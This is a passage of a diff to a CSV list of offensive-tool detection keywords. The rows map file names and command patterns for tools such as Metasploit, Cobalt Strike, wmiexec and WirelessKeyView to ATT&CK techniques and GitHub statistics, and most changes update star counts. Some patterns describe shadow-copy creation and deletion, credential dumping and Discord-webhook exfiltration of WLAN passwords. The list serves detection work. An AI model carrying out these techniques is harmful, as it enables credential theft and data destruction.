Gathering","https://github.com/A-mIn3/WINspect","1","1","N/A","N/A","6","568","116","2019-01-09T12:56:57Z","2017-08-10T15:10:10Z" "*win-x64-DynamicKernelWinExecCalc*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","","","" "*Wiper POC tool that wipes a given directory*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" @@ -18354,7 +18542,7 @@ "*wireless/cracker.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*wireless/pmkid.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*wireless/sniper.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" -"*wireless_attack_tools.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*wireless_attack_tools.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" "*wirelesskeyview.exe*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wirelesskeyview.zip*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*WirelessKeyView_x64.exe*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -18362,23 +18550,23 @@ "*wirelesskeyview-x64.zip*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wiresocks-main*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" "*wiresocks-redsocks*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" -"*Witness.py*","offensive_tool_keyword","EyeWitness","EyeWitness is designed to take screenshots of websites provide some server header info. and identify default credentials if known.EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line. nmap xml output. or nessus xml output. The --timeout flag is completely optional. and lets you provide the max time to wait when trying to render and screenshot a web page.","T1564 - T1518 - T1210 - T1514 - T1552","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/FortyNorthSecurity/EyeWitness","1","1","N/A","N/A","10","4413","812","2023-09-21T20:34:04Z","2014-02-26T16:23:25Z" -"*WitnessMe*","offensive_tool_keyword","WitnessMe","WitnessMe is primarily a Web Inventory tool inspired by Eyewitness. its also written to be extensible allowing you to create custom functionality that can take advantage of the headless browser it drives in the back-end.","T1210.001 - T1593.001 - T1593.002","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/byt3bl33d3r/WitnessMe","1","1","N/A","N/A","7","688","109","2022-12-08T11:04:13Z","2019-07-06T05:25:10Z" -"*WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*WKL-Sec/dcomhijack*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","228","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" -"*WKL-Sec/HiddenDesktop*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*WKL-Sec/Winsocky*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","79","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*Witness.py*","offensive_tool_keyword","EyeWitness","EyeWitness is designed to take screenshots of websites provide some server header info. and identify default credentials if known.EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line. nmap xml output. or nessus xml output. The --timeout flag is completely optional. and lets you provide the max time to wait when trying to render and screenshot a web page.","T1564 - T1518 - T1210 - T1514 - T1552","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/FortyNorthSecurity/EyeWitness","1","1","N/A","N/A","10","4415","812","2023-10-04T20:05:31Z","2014-02-26T16:23:25Z" +"*WitnessMe*","offensive_tool_keyword","WitnessMe","WitnessMe is primarily a Web Inventory tool inspired by Eyewitness. its also written to be extensible allowing you to create custom functionality that can take advantage of the headless browser it drives in the back-end.","T1210.001 - T1593.001 - T1593.002","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/byt3bl33d3r/WitnessMe","1","1","N/A","N/A","7","689","109","2022-12-08T11:04:13Z","2019-07-06T05:25:10Z" +"*WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*WKL-Sec/dcomhijack*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*WKL-Sec/HiddenDesktop*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*WKL-Sec/Winsocky*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" "*wkssvc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*WLAN-Windows-Passwords-Discord-Exfiltration*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*WLAN-Windows-Passwords-Discord-Exfiltration*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*WldpBypass.cs*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*wl-lic -d *.dat -r *.rsa*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*wl-lic -h HWID -m main_hash -d regkey2.dat -r regkey2.rsa*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" -"*wmap_crawler.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*wmap_crawler.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*wmeye.csproj*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*wmeye.exe *","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*wmeye.sln*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" -"*Wmi_Persistence.ps1*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*wmi_persistence.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Wmi_Persistence.ps1*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*wmi_persistence.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*wmic shadowcopy call create Volume='C:\'*","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wmic.exe* Shadowcopy Delete*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wmic/wmic.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" @@ -18387,75 +18575,75 @@ "*wmi-event-lateral-movement.*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*WMI-EventSub.cpp*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*wmiexec *.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*WMIExec.git*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","145","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*WMIExec.git*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*wmiexec.py -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*wmiexec_scheduledjob.py*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","145","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" -"*wmiexec_win32process.py*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","145","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*wmiexec_scheduledjob.py*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*wmiexec_win32process.py*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*wmiexec2.0.py*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral 